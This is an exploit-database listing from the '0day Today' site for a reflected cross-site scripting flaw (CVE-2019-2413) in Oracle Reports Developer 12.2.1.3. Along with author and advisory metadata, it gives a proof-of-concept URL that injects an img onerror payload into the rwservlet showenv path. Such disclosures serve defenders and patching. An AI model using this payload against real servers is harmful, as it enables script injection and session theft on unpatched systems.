[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Oracle Reports Developer Component 12.2.1.3 - Cross-site Scripting Vulnerability

Author
Mohamed M.Fouad
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-31991
Category
web applications
Date add
20-01-2019
Platform
php
# Exploit Title: [Cross-site Scripting (XSS)]
# Exploit Author: [Mohamed M.Fouad - From SecureMisr Company]
# Vendor Homepage: [https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html]
# Version: [12.2.1.3] (REQUIRED)
# Tested on: [Windows 10]
# CVE : [CVE-2019-2413]

POC:

https://<ip>/reports/rwservlet/showenv%22%3E%3Cimg%20src=x%20onerror=prompt(1);%3E

#  0day.today [2024-09-29]  #